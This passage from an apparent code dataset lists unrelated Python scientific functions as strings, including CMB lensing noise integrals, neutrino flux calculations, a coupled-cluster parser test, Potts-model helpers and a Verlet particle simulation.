l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def eulerphi(n):\n\treturn euler_phi(n)", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def test_put_nveto_pmt_item(self):\n pass", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, 